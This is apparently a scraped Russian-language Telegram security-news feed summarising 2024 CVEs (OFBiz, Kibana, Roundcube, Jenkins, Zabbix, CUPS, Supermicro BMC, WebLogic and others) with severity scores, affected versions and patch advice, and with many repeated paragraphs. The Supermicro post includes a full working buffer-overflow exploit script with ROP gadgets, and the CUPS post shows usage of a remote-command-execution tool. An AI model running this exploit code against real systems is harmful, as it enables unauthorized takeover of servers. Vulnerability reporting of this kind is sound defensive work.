Снова Apache #OFBiz ERP #RCE #CVE-2024-38856
Коренная причина уязвимости кроется в недостатках механизма аутентификации
CVSS score of 9.8 / 10.0.
Она затрагивает Apache OFBiz все версии до 18.12.15.
https://thehackernews.com/2024/08/new-zero-day-flaw-in-apache-ofbiz-erp.html
Big thanks Aman for news
Коренная причина уязвимости кроется в недостатках механизма аутентификации
CVSS score of 9.8 / 10.0.
Она затрагивает Apache OFBiz все версии до 18.12.15.
https://thehackernews.com/2024/08/new-zero-day-flaw-in-apache-ofbiz-erp.html
Big thanks Aman for news
#Kibana 8.14.2 / 7.17.23 arbitrary code execution via prototype pollution (ESA-2024-22)
Эта проблема затрагивает экземпляры Kibana, запущенные на Elastic Cloud, но RCE ограничено внутри контейнера Kibana Docker. Дальнейшая эксплуатация, например выход из контейнера, предотвращается с помощью seccomp-bpf и профилей AppArmor.
Affected Versions:
Kibana 8.x < versions prior to 8.14.2 and Kibana 7.x < versions prior to 7.17.23
Solutions and Mitigations:
Users should upgrade to version 8.14.2 and 7.17.23.
Severity: CVSSv3: 9.9(Critical) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 108
CVE ID: #CVE-2024-37287
https://discuss.elastic.co/t/kibana-8-14-2-7-17-23-security-update-esa-2024-22/364424
Эта проблема затрагивает экземпляры Kibana, запущенные на Elastic Cloud, но RCE ограничено внутри контейнера Kibana Docker. Дальнейшая эксплуатация, например выход из контейнера, предотвращается с помощью seccomp-bpf и профилей AppArmor.
Affected Versions:
Kibana 8.x < versions prior to 8.14.2 and Kibana 7.x < versions prior to 7.17.23
Solutions and Mitigations:
Users should upgrade to version 8.14.2 and 7.17.23.
Severity: CVSSv3: 9.9(Critical) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 108
CVE ID: #CVE-2024-37287
https://discuss.elastic.co/t/kibana-8-14-2-7-17-23-security-update-esa-2024-22/364424
#Roundcube #CVE-2024-42009 и #CVE-2024-42008 - обе ошибки XSS. Первая позволяет удаленному злоумышленнику украсть и отправить электронную почту жертвы через поддельное сообщение, вторая - через вредоносное вложение.
Severity: еще не выдана оценка
Третяя #CVE-2024-42010 - позволяет использовать недостаточно отфильтрованные последовательности маркеров Cascading Style Sheets (CSS) в отрисованных почтовых сообщениях, что позволяет удаленному злоумышленнику получить конфиденциальную информацию.
Severity: High 7.5/ 10
https://github.com/roundcube/roundcubemail/releases
Кто юзает обновляйтесь
Severity: еще не выдана оценка
Третяя #CVE-2024-42010 - позволяет использовать недостаточно отфильтрованные последовательности маркеров Cascading Style Sheets (CSS) в отрисованных почтовых сообщениях, что позволяет удаленному злоумышленнику получить конфиденциальную информацию.
Severity: High 7.5/ 10
https://github.com/roundcube/roundcubemail/releases
Кто юзает обновляйтесь
Снова Jenkins
#CVE-2024-43044 | #CVE-2024-43045 Critical Jenkins Vulnerability Exposes Servers to RCE Attacks
Jenkins 2.470, LTS 2.452.3 и более ранние версии позволяют процессам агента читать произвольные файлы из файловой системы контроллера Jenkins с помощью метода `
CVSS Score : 9.1
Обновите до версии LTS 2.452.3 и 2.470 и выше
https://www.jenkins.io/security/advisory/2024-08-07/
https://github.com/advisories/GHSA-h856-ffvv-xvr4
#CVE-2024-43044 | #CVE-2024-43045 Critical Jenkins Vulnerability Exposes Servers to RCE Attacks
Jenkins 2.470, LTS 2.452.3 и более ранние версии позволяют процессам агента читать произвольные файлы из файловой системы контроллера Jenkins с помощью метода `
ClassLoaderProxy#fetchJar
` в библиотеке Remoting.CVSS Score : 9.1
Обновите до версии LTS 2.452.3 и 2.470 и выше
https://www.jenkins.io/security/advisory/2024-08-07/
https://github.com/advisories/GHSA-h856-ffvv-xvr4
#CVE-2024-22116 Critical RCE в Zabbix Monitoring Solution
An administrator with restricted permissions can exploit the lack of default escaping for script parameters.
CVSS 9.9
The vulnerability affects the following versions of Zabbix:
6.4.0 to 6.4.15
7.0.0alpha1 to 7.0.0rc2
Zabbix has addressed this issue in the following fixed versions:
6.4.16rc1
7.0.0rc3
https://support.zabbix.com/browse/ZBX-25016
An administrator with restricted permissions can exploit the lack of default escaping for script parameters.
CVSS 9.9
The vulnerability affects the following versions of Zabbix:
6.4.0 to 6.4.15
7.0.0alpha1 to 7.0.0rc2
Zabbix has addressed this issue in the following fixed versions:
6.4.16rc1
7.0.0rc3
https://support.zabbix.com/browse/ZBX-25016
Критическая уязвимость TCP/IP #CVE-2024-38063 от 13 августа 2024 обзавелась первым PoC'ом. Пусть это и приводит к крашу ipv6 через flask питона, но уже есть над чем работать.
Форкнул себе на всякий случай
https://github.com/cleverg0d/CVE-2024-38063-POC
Форкнул себе на всякий случай
https://github.com/cleverg0d/CVE-2024-38063-POC
Уязвимость #CVE-2024-8698 в #Keycloak подвергает риску аутентификацию SAML (keycloak-saml-core)
CVSS v3: 7.7
https://nvd.nist.gov/vuln/detail/CVE-2024-8698
Патч вышел https://github.com/keycloak/keycloak/releases/tag/25.0.6
CVSS v3: 7.7
https://nvd.nist.gov/vuln/detail/CVE-2024-8698
Патч вышел https://github.com/keycloak/keycloak/releases/tag/25.0.6
В ядре Linux найден #LPE #CVE-2024-26808 и #CVE-2024-1085 -
Уязвимости вызваны обращением к уже освобождённой области памяти в функциях nft_chain_filter и nft_setelem_catchall_deactivate в подсистеме netfilter и позволяют добиться выполнения кода с правами root.
Для проведения атаки требуется наличие доступа к nftables, который можно получить при наличии прав CAP_NET_ADMIN в любом пространстве имён идентификаторов пользователей (user namespace) или сетевом пространстве имён (network namespace), предоставляемых, например, в изолированных контейнерах.
Устранены в обновлениях ядер 5.10.210, 5.15.149, 6.1.76, 6.6.15, 6.7.3 и 6.8, и уже в основных дистрибутивах (Debian, Ubuntu, RHEL, SUSE, Fedora).
PoC: https://github.com/google/security-research/tree/master/pocs/linux/kernelctf/CVE-2024-26808_cos/exploit/cos-105-17412.294.36
Уязвимости вызваны обращением к уже освобождённой области памяти в функциях nft_chain_filter и nft_setelem_catchall_deactivate в подсистеме netfilter и позволяют добиться выполнения кода с правами root.
Для проведения атаки требуется наличие доступа к nftables, который можно получить при наличии прав CAP_NET_ADMIN в любом пространстве имён идентификаторов пользователей (user namespace) или сетевом пространстве имён (network namespace), предоставляемых, например, в изолированных контейнерах.
Устранены в обновлениях ядер 5.10.210, 5.15.149, 6.1.76, 6.6.15, 6.7.3 и 6.8, и уже в основных дистрибутивах (Debian, Ubuntu, RHEL, SUSE, Fedora).
PoC: https://github.com/google/security-research/tree/master/pocs/linux/kernelctf/CVE-2024-26808_cos/exploit/cos-105-17412.294.36
Forwarded from Похек (Сергей Зыбнев)
This media is not supported in your browser
VIEW IN TELEGRAM
#unix #RCE #CVE
CVE-2024-47176 CVE-2024-47076 CVE-2024-47175 CVE-2024-47177
Вчера вечером интернет наводнился новостью о новой баге в UNIX системах, которая позволяет выполнить неавторизованный RCE. Но были особые условия, к примеру что должна быть очередь на печать. В прикрепленном видосе демонстрируется PoC.
Авторы эксплойта изучили коммит в OpenPrinting CUPS, в котором была исправлена бага и написали эксплойт. Он использует dns-sd обнаружение принтера, требуя, чтобы цель могла получить широковещательное сообщение, т.е. находилась в той же сети.
usage: cupshax.py [-h] [--name NAME] --ip IP [--command COMMAND] [--port PORT]
A script for executing commands remotely
options:
-h, --help show this help message and exit
--name NAME The name to use (default: RCE Printer)
--ip IP The IP address of the machine running this script
--command COMMAND The command to execute (default: 'touch /tmp/pwn')
--port PORT The port to connect on (default: 8631)
python cupshax.py --name "Print to PDF (Color)" \
--command "id>/tmp/pwn" \
--ip 10.0.0.3
Please open Telegram to view this post
VIEW IN TELEGRAM
Мы знаем как админы не любят менять заводские пароли к админкам сереров типа iDrac, iLO и др. И вот вишинка #CVE-2024-36435
с CVSS 9.8 в прошивке BMC компании Supermicro в некоторых материнских платах X11, X12, H12, B12, X13, H13 и B13 (и модулях CMM6).
Неавторизованный пользователь может отправить в интерфейс поддельные данные, которые вызывают переполнение буфера стека и могут привести к произвольному RCE а на BMC.
https://www.binarly.io/blog/cve-2024-36435-deep-dive-the-years-most-critical-bmc-security-flaw
PoC:
с CVSS 9.8 в прошивке BMC компании Supermicro в некоторых материнских платах X11, X12, H12, B12, X13, H13 и B13 (и модулях CMM6).
Неавторизованный пользователь может отправить в интерфейс поддельные данные, которые вызывают переполнение буфера стека и могут привести к произвольному RCE а на BMC.
https://www.binarly.io/blog/cve-2024-36435-deep-dive-the-years-most-critical-bmc-security-flaw
PoC:
# CVE-2024-36435 – Buffer overflow vulnerability in Supermicro BMC IPMI firmware due to unchecked length of user-supplied value
import base64
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# set target and command values
target = "https://192.168.10.53:443/cgi/login.cgi"
command = "touch /tmp/BRLY"
libc_base = 0x76283000 # we try to guess
gadget_1_offset = 0x000D8874 # pop {r0, r1, r2, r3, fp, pc};
gadget_2_offset = 0x001026D4 # mov r0, sp; blx r3;
system_offset = 0x0003C4D4
print(f"Target: {target}")
print(f"Command: {command}")
print()
print(f"libc_base: {libc_base:#x}")
print(f"gadget_1_offset: {gadget_1_offset:#x}")
print(f"gadget_2_offset: {gadget_2_offset:#x}")
print(f"system_offset: {system_offset:#x}")
print()
payload = base64.b64encode(
b"\x00" * 456
+ int.to_bytes(libc_base + gadget_1_offset, 4, "little") # gadget_1
+ b"\x00" * 12
+ int.to_bytes(libc_base + system_offset, 4, "little") # system
+ b"\x00" * 4
+ int.to_bytes(libc_base + gadget_2_offset, 4, "little") # gadget_2
+ command.encode()
).decode()
data = f"name={payload}&pwd=&check=1"
print("Sending requests...")
i = 0
while True:
print(f"Request: '{i}'")
r = requests.post(target, data=data, verify=False)
i += 1
Forwarded from APT
This media is not supported in your browser
VIEW IN TELEGRAM
An in-depth look at CVE-2024-30090, a vulnerability in Kernel Streaming, allowing privilege escalation via malformed IOCTL requests. By leveraging KS Event mishandling during 32-bit to 64-bit conversions, can exploit the bug pattern to gain arbitrary kernel mode access.
🔗 Research:
Proxying to Kernel - Part I
Proxying to Kernel - Part II
🔗 Source:
https://github.com/Dor00tkit/CVE-2024-30090
#windows #streaming #kernel #cve #poc
Please open Telegram to view this post
VIEW IN TELEGRAM
Критическая уязвимость #CVE-2024-21216 в Oracle #WebLogic Server - Позволяет неаутентифицированному злоумышленнику, имеющему доступ к сети через T3 и IIOP привести к полному захвату сервера.
CVSS 3.1 Score: 9.8
Уязвимы версии: с 12.2.1.4.0 по 14.1.1.0.0
https://github.com/advisories/GHSA-r389-865g-hcg3
CVSS 3.1 Score: 9.8
Уязвимы версии: с 12.2.1.4.0 по 14.1.1.0.0
https://github.com/advisories/GHSA-r389-865g-hcg3